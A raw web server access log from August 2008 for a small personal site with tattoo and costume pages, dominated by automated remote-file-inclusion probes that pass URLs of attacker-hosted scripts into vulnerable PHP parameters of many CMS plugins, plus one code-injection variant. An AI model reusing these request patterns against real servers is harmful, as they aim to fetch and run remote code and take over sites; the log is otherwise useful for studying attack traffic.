212.219.59.222 - - [24/Aug/2008:08:21:42 -0500] "GET /tattoo/tatc2.JPG HTTP/1.0" 200 17893 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 3.0.04506.30)"
212.219.59.222 - - [24/Aug/2008:08:21:42 -0500] "GET /tattoo/tatc7.JPG HTTP/1.0" 200 12347 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 3.0.04506.30)"
74.6.8.121 - - [24/Aug/2008:08:22:13 -0500] "GET /logs/access_log.1201132800 HTTP/1.0" 200 244341 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
66.40.56.32 - - [24/Aug/2008:08:22:25 -0500] "GET /logs/access_log.1214870400/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.saren-first.com/images/n.txt??%0D?? HTTP/1.1" 404 349 "-""libwww-perl/5.811"
66.40.56.32 - - [24/Aug/2008:08:22:25 -0500] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.saren-first.com/images/n.txt??%0D?? HTTP/1.1" 404 322 "-""libwww-perl/5.811"
66.40.56.32 - - [24/Aug/2008:08:22:25 -0500] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.saren-first.com/images/n.txt??%0D?? HTTP/1.1" 404 327 "-""libwww-perl/5.811"
89.111.184.180 - - [24/Aug/2008:08:22:48 -0500] "GET /logs/popup.php?path=http://fratore.altervista.org/ufficio/tommy.txt? HTTP/1.1" 404 298 "-""Mozilla/3.0 (OS/2; U)"
89.111.184.180 - - [24/Aug/2008:08:22:48 -0500] "GET /popup.php?path=http://fratore.altervista.org/ufficio/tommy.txt? HTTP/1.1" 404 293 "-""Mozilla/3.0 (OS/2; U)"
66.40.56.32 - - [24/Aug/2008:08:23:17 -0500] "GET /logs/access_log.1214956800/errors.php?error=http://www.saren-first.com/images/n.txt??%0D?? HTTP/1.1" 404 321 "-""libwww-perl/5.811"
66.40.56.32 - - [24/Aug/2008:08:23:17 -0500] "GET /errors.php?error=http://www.saren-first.com/images/n.txt??%0D?? HTTP/1.1" 404 294 "-""libwww-perl/5.811"
66.40.56.32 - - [24/Aug/2008:08:23:17 -0500] "GET /logs/errors.php?error=http://www.saren-first.com/images/n.txt??%0D?? HTTP/1.1" 404 299 "-""libwww-perl/5.811"
66.40.56.32 - - [24/Aug/2008:08:23:17 -0500] "GET /logs/access_log.1214870400/errors.php?error=http://www.saren-first.com/images/n.txt??%0D?? HTTP/1.1" 404 321 "-""libwww-perl/5.811"
82.194.76.177 - - [24/Aug/2008:08:23:38 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://pa-lavvenireprato.it/administrator/components/com_remository/images/idilegal.txt??? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
82.194.76.177 - - [24/Aug/2008:08:23:38 -0500] "GET //skin/zero_vote/error.php?dir=http://pa-lavvenireprato.it/administrator/components/com_remository/images/idilegal.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
82.194.76.177 - - [24/Aug/2008:08:23:40 -0500] "GET /logs/access_log.1201564800//skin/zero_vote/error.php?dir=http://pa-lavvenireprato.it/administrator/components/com_remository/images/idilegal.txt??? HTTP/1.1" 404 336 "-""libwww-perl/5.805"
69.94.70.15 - - [24/Aug/2008:08:24:51 -0500] "GET //modules/xfsection/modify.php?dir_module=http://www.teamprobes.net/id.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.65"
66.40.56.32 - - [24/Aug/2008:08:25:11 -0500] "GET /logs/access_log.1214956800//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.saren-first.com/images/n.txt??%0D?? HTTP/1.1" 404 365 "-""libwww-perl/5.811"
66.40.56.32 - - [24/Aug/2008:08:25:11 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.saren-first.com/images/n.txt??%0D?? HTTP/1.1" 404 338 "-""libwww-perl/5.811"
66.40.56.32 - - [24/Aug/2008:08:25:11 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.saren-first.com/images/n.txt??%0D?? HTTP/1.1" 404 343 "-""libwww-perl/5.811"
66.40.56.32 - - [24/Aug/2008:08:25:11 -0500] "GET /logs/access_log.1214870400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.saren-first.com/images/n.txt??%0D?? HTTP/1.1" 404 365 "-""libwww-perl/5.811"
77.221.130.3 - - [24/Aug/2008:08:26:33 -0500] "GET /logs/access_log.1206230400//?path%5Bdocroot%5D=http://www.jorvani.com/subastas/includes/images/idnews.txt? HTTP/1.1" 404 312 "-""libwww-perl/5.803"
74.6.8.121 - - [24/Aug/2008:08:26:54 -0500] "GET /logs/access_log.1207094400 HTTP/1.0" 200 228905 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
64.22.89.194 - - [24/Aug/2008:08:27:40 -0500] "GET /logs/inc/cmses/aedatingCMS.php?dir[inc]=http://secret-admirer.info/scan/id.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.812"
64.22.89.194 - - [24/Aug/2008:08:27:40 -0500] "GET /inc/cmses/aedatingCMS.php?dir[inc]=http://secret-admirer.info/scan/id.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.812"
80.13.168.195 - - [24/Aug/2008:08:27:45 -0500] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.saren-first.com/images/n.txt??%0D?? HTTP/1.1" 404 327 "-""libwww-perl/5.803"
64.22.89.194 - - [24/Aug/2008:08:27:46 -0500] "GET /logs/inc/cmses/aedatingCMS.php?dir[inc]=http://secret-admirer.info/scan/id.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.812"
64.22.89.194 - - [24/Aug/2008:08:27:46 -0500] "GET /inc/cmses/aedatingCMS.php?dir[inc]=http://secret-admirer.info/scan/id.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.812"
80.93.62.114 - - [24/Aug/2008:08:31:17 -0500] "GET /logs/lostpasswd.php?env[include_prefix]=http://spiritualcultivation.com/modules/idxx.txt????? HTTP/1.1" 404 303 "-""libwww-perl/5.805"
80.93.62.114 - - [24/Aug/2008:08:31:18 -0500] "GET /lostpasswd.php?env[include_prefix]=http://spiritualcultivation.com/modules/idxx.txt????? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
209.217.116.153 - - [24/Aug/2008:08:31:47 -0500] "GET /logs/access_log.1213488000/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.marioni.info/id.txt??? HTTP/1.1" 404 355 "-""libwww-perl/5.79"
62.65.159.210 - - [24/Aug/2008:08:32:22 -0500] "GET //modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.yallaweb.net/images/grey/tbl/DEVILS/help.txt? HTTP/1.1" 404 328 "-""libwww-perl/5.76"
74.55.246.194 - - [24/Aug/2008:08:32:23 -0500] "GET /logs/access_log.1194912000/index.php?go=http://www.yallaweb.net/images/grey/tbl/DEVILS/help.txt? HTTP/1.1" 404 320 "-""libwww-perl/5.814"
74.55.246.194 - - [24/Aug/2008:08:32:23 -0500] "GET /index.php?go=http://www.yallaweb.net/images/grey/tbl/DEVILS/help.txt? HTTP/1.1" 404 293 "-""libwww-perl/5.814"
74.55.246.194 - - [24/Aug/2008:08:32:23 -0500] "GET /logs/index.php?go=http://www.yallaweb.net/images/grey/tbl/DEVILS/help.txt? HTTP/1.1" 404 298 "-""libwww-perl/5.814"
74.55.246.194 - - [24/Aug/2008:08:32:48 -0500] "GET /logs/access_log.1194912000/index.php?go=http://www.yallaweb.net/images/grey/tbl/DEVILS/help.txt? HTTP/1.1" 404 320 "-""libwww-perl/5.814"
74.55.246.194 - - [24/Aug/2008:08:32:48 -0500] "GET /index.php?go=http://www.yallaweb.net/images/grey/tbl/DEVILS/help.txt? HTTP/1.1" 404 293 "-""libwww-perl/5.814"
74.55.246.194 - - [24/Aug/2008:08:32:48 -0500] "GET /logs/index.php?go=http://www.yallaweb.net/images/grey/tbl/DEVILS/help.txt? HTTP/1.1" 404 298 "-""libwww-perl/5.814"
69.94.70.15 - - [24/Aug/2008:08:32:53 -0500] "GET /logs/access_log.1208044800//modules/xfsection/modify.php?dir_module=http://www.teamprobes.net/id.txt?? HTTP/1.1" 404 340 "-""libwww-perl/5.65"
69.94.70.15 - - [24/Aug/2008:08:32:54 -0500] "GET //modules/xfsection/modify.php?dir_module=http://www.teamprobes.net/id.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.65"
69.94.70.15 - - [24/Aug/2008:08:32:54 -0500] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.teamprobes.net/id.txt?? HTTP/1.1" 404 318 "-""libwww-perl/5.65"
69.94.70.15 - - [24/Aug/2008:08:33:04 -0500] "GET /logs/access_log.1205366400//modules/xfsection/modify.php?dir_module=http://www.teamprobes.net/id.txt?? HTTP/1.1" 404 340 "-""libwww-perl/5.65"
70.252.14.239 - - [24/Aug/2008:08:33:58 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 3776 "http://www.google.com/search?q=vintage+flash&rls=com.microsoft:en-us:IE-SearchBox&ie=UTF-8&oe=UTF-8&sourceid=ie7&rlz=1I7WZPA""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 1.1.4322; InfoPath.2)"
70.252.14.239 - - [24/Aug/2008:08:33:59 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 1.1.4322; InfoPath.2)"
70.252.14.239 - - [24/Aug/2008:08:33:59 -0500] "GET /tattoo/webring.jpg HTTP/1.1" 200 13114 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 1.1.4322; InfoPath.2)"
70.252.14.239 - - [24/Aug/2008:08:33:59 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 1.1.4322; InfoPath.2)"
190.137.181.149 - - [24/Aug/2008:08:35:18 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://juegos0nline.webcindario.com/id.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
190.137.181.149 - - [24/Aug/2008:08:35:22 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://juegos0nline.webcindario.com/id.txt??? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
84.16.251.245 - - [24/Aug/2008:08:35:24 -0500] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://peru.americautos.com/images/_MD.TXT?? HTTP/1.1" 404 331 "-""Microsoft Internet Explorer/4.0b1 (Windows 95)"
84.16.251.245 - - [24/Aug/2008:08:35:24 -0500] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://peru.americautos.com/images/_MD.TXT?? HTTP/1.1" 404 326 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
217.172.186.250 - - [24/Aug/2008:08:35:39 -0500] "GET /logs/access_log.1183507200/tools/send_reminders.php?noSet=0&includedir=http://www.yallaweb.net/images/grey/tbl/DEVILS/help.txt? HTTP/1.1" 404 335 "-""libwww-perl/5.803"
217.172.186.250 - - [24/Aug/2008:08:35:39 -0500] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.yallaweb.net/images/grey/tbl/DEVILS/help.txt? HTTP/1.1" 404 308 "-""libwww-perl/5.803"
217.172.186.250 - - [24/Aug/2008:08:35:39 -0500] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://www.yallaweb.net/images/grey/tbl/DEVILS/help.txt? HTTP/1.1" 404 313 "-""libwww-perl/5.803"
217.172.186.250 - - [24/Aug/2008:08:36:40 -0500] "GET /logs/access_log.1193443200/tools/send_reminders.php?noSet=0&includedir=http://www.yallaweb.net/images/grey/tbl/DEVILS/help.txt? HTTP/1.1" 404 335 "-""libwww-perl/5.803"
77.221.130.3 - - [24/Aug/2008:08:37:53 -0500] "GET /logs//?path%5Bdocroot%5D=http://www.jorvani.com/subastas/includes/images/idnews.txt? HTTP/1.1" 200 96475 "-""libwww-perl/5.803"
80.13.168.195 - - [24/Aug/2008:08:37:53 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.saren-first.com/images/n.txt??%0D?? HTTP/1.1" 404 338 "-""libwww-perl/5.803"
77.221.130.3 - - [24/Aug/2008:08:37:54 -0500] "GET //?path%5Bdocroot%5D=http://www.jorvani.com/subastas/includes/images/idnews.txt? HTTP/1.1" 200 1243 "-""libwww-perl/5.803"
62.212.130.16 - - [24/Aug/2008:08:38:04 -0500] "GET //?path%5Bdocroot%5D=http://fratore.altervista.org/ufficio/tommy.txt? HTTP/1.1" 200 1243 "-""Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)"
62.212.130.16 - - [24/Aug/2008:08:38:05 -0500] "GET /logs//?path%5Bdocroot%5D=http://fratore.altervista.org/ufficio/tommy.txt? HTTP/1.1" 200 96475 "-""Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)"
67.212.173.42 - - [24/Aug/2008:08:39:18 -0500] "GET /logs/access_log.1208044800//modules/xfsection/modify.php?dir_module=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 340 "-""libwww-perl/5.811"
67.212.173.42 - - [24/Aug/2008:08:39:18 -0500] "GET //modules/xfsection/modify.php?dir_module=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 313 "-""libwww-perl/5.811"
67.212.173.42 - - [24/Aug/2008:08:39:18 -0500] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 318 "-""libwww-perl/5.811"
205.134.252.10 - - [24/Aug/2008:08:39:18 -0500] "GET /logs//header.php?prefix=http://apai.yourfreehosting.net/id.gif? HTTP/1.1" 404 300 "-""libwww-perl/5.810"
205.134.252.10 - - [24/Aug/2008:08:39:18 -0500] "GET //header.php?prefix=http://apai.yourfreehosting.net/id.gif? HTTP/1.1" 404 295 "-""libwww-perl/5.810"
205.134.252.10 - - [24/Aug/2008:08:39:19 -0500] "GET /logs//header.php?prefix=http://apai.yourfreehosting.net/id.gif? HTTP/1.1" 404 300 "-""libwww-perl/5.810"
205.134.252.10 - - [24/Aug/2008:08:39:19 -0500] "GET //header.php?prefix=http://apai.yourfreehosting.net/id.gif? HTTP/1.1" 404 295 "-""libwww-perl/5.810"
80.93.212.218 - - [24/Aug/2008:08:39:27 -0500] "GET /logs/s_loadenv.inc.php?DOCUMENT_ROOT=http://www.mcclung.ca/prc.gif? HTTP/1.1" 404 306 "-""libwww-perl/5.808"
85.126.175.146 - - [24/Aug/2008:08:39:31 -0500] "GET /logs//header.php?prefix=http://apai.yourfreehosting.net/id.gif? HTTP/1.1" 404 300 "-""libwww-perl/5.803"
85.126.175.146 - - [24/Aug/2008:08:39:31 -0500] "GET /logs//header.php?prefix=http://apai.yourfreehosting.net/id.gif? HTTP/1.1" 404 300 "-""libwww-perl/5.803"
85.126.175.146 - - [24/Aug/2008:08:39:32 -0500] "GET //header.php?prefix=http://apai.yourfreehosting.net/id.gif? HTTP/1.1" 404 295 "-""libwww-perl/5.803"
85.126.175.146 - - [24/Aug/2008:08:39:32 -0500] "GET //header.php?prefix=http://apai.yourfreehosting.net/id.gif? HTTP/1.1" 404 295 "-""libwww-perl/5.803"
80.93.212.218 - - [24/Aug/2008:08:39:35 -0500] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.mcclung.ca/prc.gif? HTTP/1.1" 404 301 "-""libwww-perl/5.808"
89.248.101.69 - - [24/Aug/2008:08:39:37 -0500] "GET /logs//header.php?prefix=http://apai.yourfreehosting.net/id.gif? HTTP/1.1" 404 300 "-""libwww-perl/5.803"
89.248.101.69 - - [24/Aug/2008:08:39:38 -0500] "GET //header.php?prefix=http://apai.yourfreehosting.net/id.gif? HTTP/1.1" 404 295 "-""libwww-perl/5.803"
89.248.101.69 - - [24/Aug/2008:08:39:54 -0500] "GET /logs//header.php?prefix=http://apai.yourfreehosting.net/id.gif? HTTP/1.1" 404 300 "-""libwww-perl/5.803"
89.248.101.69 - - [24/Aug/2008:08:39:54 -0500] "GET //header.php?prefix=http://apai.yourfreehosting.net/id.gif? HTTP/1.1" 404 295 "-""libwww-perl/5.803"
89.208.43.121 - - [24/Aug/2008:08:40:09 -0500] "GET /logs/access_log.1206230400//modules/4nAlbum/public/displayCategory.php?basepath=http://www.sldating.fr/idd.txt?? HTTP/1.1" 404 354 "-""libwww-perl/5.805"
89.208.43.121 - - [24/Aug/2008:08:40:10 -0500] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.sldating.fr/idd.txt?? HTTP/1.1" 404 327 "-""libwww-perl/5.805"
89.208.43.121 - - [24/Aug/2008:08:40:10 -0500] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.sldating.fr/idd.txt?? HTTP/1.1" 404 332 "-""libwww-perl/5.805"
81.26.209.159 - - [24/Aug/2008:08:40:49 -0500] "GET /logs/access_log.1208044800//modules/xfsection/modify.php?dir_module=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 340 "-""libwww-perl/5.79"
81.26.209.159 - - [24/Aug/2008:08:40:49 -0500] "GET //modules/xfsection/modify.php?dir_module=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 313 "-""libwww-perl/5.79"
81.26.209.159 - - [24/Aug/2008:08:40:49 -0500] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 318 "-""libwww-perl/5.79"
74.6.8.121 - - [24/Aug/2008:08:41:16 -0500] "GET /logs/?N=D HTTP/1.0" 200 96297 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
70.87.139.98 - - [24/Aug/2008:08:41:22 -0500] "GET /logs/components/com_facileforms/facileforms.frame.php?ff_compath=http://www.hhaynes.com/.smileys/smiley17.gif?? HTTP/1.1" 404 337 "-""libwww-perl/5.811"
70.87.139.98 - - [24/Aug/2008:08:41:22 -0500] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://www.hhaynes.com/.smileys/smiley17.gif?? HTTP/1.1" 404 332 "-""libwww-perl/5.811"
89.208.43.121 - - [24/Aug/2008:08:44:44 -0500] "GET /logs/access_log.1206230400//modules/4nAlbum/public/displayCategory.php?basepath=http://www.sldating.fr/idd.txt? HTTP/1.1" 404 354 "-""libwww-perl/5.805"
89.208.43.121 - - [24/Aug/2008:08:44:45 -0500] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.sldating.fr/idd.txt? HTTP/1.1" 404 327 "-""libwww-perl/5.805"
89.208.43.121 - - [24/Aug/2008:08:44:45 -0500] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.sldating.fr/idd.txt? HTTP/1.1" 404 332 "-""libwww-perl/5.805"
78.98.19.2 - - [24/Aug/2008:08:44:48 -0500] "GET /costume/costume2.htm HTTP/1.1" 200 1810 "http://gotika.webpark.cz/cesky/X_01_01.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; sk; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
78.98.19.2 - - [24/Aug/2008:08:44:48 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; sk; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
78.98.19.2 - - [24/Aug/2008:08:44:51 -0500] "GET /costume/index1.htm HTTP/1.1" 200 21563 "http://tomdolan.pconline.com/costume/costume2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; sk; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
217.172.186.250 - - [24/Aug/2008:08:45:23 -0500] "GET /logs/access_log.1194912000/index.php?go=http://www.yallaweb.net/images/grey/tbl/DEVILS/help.txt? HTTP/1.1" 404 320 "-""libwww-perl/5.803"
217.172.186.250 - - [24/Aug/2008:08:45:23 -0500] "GET /index.php?go=http://www.yallaweb.net/images/grey/tbl/DEVILS/help.txt? HTTP/1.1" 404 293 "-""libwww-perl/5.803"
217.172.186.250 - - [24/Aug/2008:08:45:23 -0500] "GET /logs/index.php?go=http://www.yallaweb.net/images/grey/tbl/DEVILS/help.txt? HTTP/1.1" 404 298 "-""libwww-perl/5.803"
72.9.233.10 - - [24/Aug/2008:08:45:37 -0500] "GET //modules/Forums/admin/errors.php?error=http://borneo.siteburg.com/id2.txt?? HTTP/1.1" 404 316 "-""libwww-perl/5.810"
66.40.56.32 - - [24/Aug/2008:08:46:34 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.saren-first.com/images/n.txt??%0D?? HTTP/1.1" 404 321 "-""libwww-perl/5.811"
66.40.56.32 - - [24/Aug/2008:08:46:34 -0500] "GET /logs/access_log.1216598400//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.saren-first.com/images/n.txt??%0D?? HTTP/1.1" 404 348 "-""libwww-perl/5.811"
66.40.56.32 - - [24/Aug/2008:08:46:34 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.saren-first.com/images/n.txt??%0D?? HTTP/1.1" 404 326 "-""libwww-perl/5.811"
82.194.76.177 - - [24/Aug/2008:08:46:57 -0500] "GET /logs//cms1/login.inc.php?pdir=http://audi.spb.ru/img/gal/2008/bot.txt?? HTTP/1.1" 404 308 "-""Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)"
82.194.76.177 - - [24/Aug/2008:08:46:58 -0500] "GET //cms1/login.inc.php?pdir=http://audi.spb.ru/img/gal/2008/bot.txt?? HTTP/1.1" 404 303 "-""Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)"
203.98.87.14 - - [24/Aug/2008:08:48:08 -0500] "GET //modules/Forums/admin/errors.php?error=http://borneo.siteburg.com/id2.txt?? HTTP/1.1" 404 316 "-""libwww-perl/5.79"
89.208.43.121 - - [24/Aug/2008:08:49:10 -0500] "GET /logs/access_log.1205366400/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.sldating.fr/idd.txt?? HTTP/1.1" 404 371 "-""libwww-perl/5.805"
89.208.43.121 - - [24/Aug/2008:08:49:12 -0500] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.sldating.fr/idd.txt?? HTTP/1.1" 404 344 "-""libwww-perl/5.805"
89.208.43.121 - - [24/Aug/2008:08:49:12 -0500] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.sldating.fr/idd.txt?? HTTP/1.1" 404 349 "-""libwww-perl/5.805"
89.208.43.121 - - [24/Aug/2008:08:50:18 -0500] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.sldating.fr/idd.txt? HTTP/1.1" 404 349 "-""libwww-perl/5.805"
89.208.43.121 - - [24/Aug/2008:08:50:19 -0500] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.sldating.fr/idd.txt? HTTP/1.1" 404 344 "-""libwww-perl/5.805"
67.195.37.156 - - [24/Aug/2008:08:50:53 -0500] "GET /costume/thmb3.htm HTTP/1.0" 200 2922 "-""Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.4) Gecko/20080721 BonEcho/2.0.0.4"
89.208.43.121 - - [24/Aug/2008:08:51:06 -0500] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.sldating.fr/idd.txt? HTTP/1.1" 404 349 "-""libwww-perl/5.805"
89.208.43.121 - - [24/Aug/2008:08:51:06 -0500] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.sldating.fr/idd.txt? HTTP/1.1" 404 344 "-""libwww-perl/5.805"
64.22.89.194 - - [24/Aug/2008:08:51:30 -0500] "GET /logs/access_log.1214179200/includes/ktedit/toolbar.php?dirDepth=http://secret-admirer.info/scan/id.txt?? HTTP/1.1" 404 338 "-""libwww-perl/5.812"
64.22.89.194 - - [24/Aug/2008:08:51:30 -0500] "GET /includes/ktedit/toolbar.php?dirDepth=http://secret-admirer.info/scan/id.txt?? HTTP/1.1" 404 311 "-""libwww-perl/5.812"
64.22.89.194 - - [24/Aug/2008:08:51:30 -0500] "GET /logs/includes/ktedit/toolbar.php?dirDepth=http://secret-admirer.info/scan/id.txt?? HTTP/1.1" 404 316 "-""libwww-perl/5.812"
89.208.43.121 - - [24/Aug/2008:08:51:32 -0500] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.sldating.fr/idd.txt? HTTP/1.1" 404 327 "-""libwww-perl/5.805"
89.208.43.121 - - [24/Aug/2008:08:51:39 -0500] "GET /logs/access_log.1206230400/modules/My_eGallery/index.php?basepath=http://www.sldating.fr/idd.txt?? HTTP/1.1" 404 340 "-""libwww-perl/5.805"
89.208.43.121 - - [24/Aug/2008:08:51:39 -0500] "GET /modules/My_eGallery/index.php?basepath=http://www.sldating.fr/idd.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
89.208.43.121 - - [24/Aug/2008:08:51:39 -0500] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.sldating.fr/idd.txt?? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
66.40.56.32 - - [24/Aug/2008:08:51:59 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.saren-first.com/images/n.txt??%0D?? HTTP/1.1" 404 309 "-""libwww-perl/5.811"
66.40.56.32 - - [24/Aug/2008:08:51:59 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.saren-first.com/images/n.txt??%0D?? HTTP/1.1" 404 314 "-""libwww-perl/5.811"
66.40.56.32 - - [24/Aug/2008:08:51:59 -0500] "GET /logs/access_log.1215388800//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.saren-first.com/images/n.txt??%0D?? HTTP/1.1" 404 336 "-""libwww-perl/5.811"
66.40.56.32 - - [24/Aug/2008:08:51:59 -0500] "GET /logs/access_log.1215561600//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.saren-first.com/images/n.txt??%0D?? HTTP/1.1" 404 336 "-""libwww-perl/5.811"
80.13.168.195 - - [24/Aug/2008:08:52:58 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.saren-first.com/images/n.txt??%0D?? HTTP/1.1" 404 309 "-""libwww-perl/5.803"
80.13.168.195 - - [24/Aug/2008:08:53:00 -0500] "GET /logs/access_log.1215561600//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.saren-first.com/images/n.txt??%0D?? HTTP/1.1" 404 336 "-""libwww-perl/5.803"
80.13.168.195 - - [24/Aug/2008:08:53:01 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.saren-first.com/images/n.txt??%0D?? HTTP/1.1" 404 314 "-""libwww-perl/5.803"
89.208.43.121 - - [24/Aug/2008:08:53:12 -0500] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.sldating.fr/idd.txt? HTTP/1.1" 404 344 "-""libwww-perl/5.805"
91.200.212.3 - - [24/Aug/2008:08:53:27 -0500] "GET /logs/access_log.1206230400///vwar/backup/errors.php?error=http://www.tiibetinspanielit.fi/forum/ids.txt?? HTTP/1.1" 404 335 "-""libwww-perl/5.803"
91.200.212.3 - - [24/Aug/2008:08:53:27 -0500] "GET ///vwar/backup/errors.php?error=http://www.tiibetinspanielit.fi/forum/ids.txt?? HTTP/1.1" 404 308 "-""libwww-perl/5.803"
91.200.212.3 - - [24/Aug/2008:08:53:27 -0500] "GET /logs///vwar/backup/errors.php?error=http://www.tiibetinspanielit.fi/forum/ids.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.803"
82.194.76.177 - - [24/Aug/2008:08:54:12 -0500] "GET /logs/access_log.1214438400//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://lipuu.com/tool/chid.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
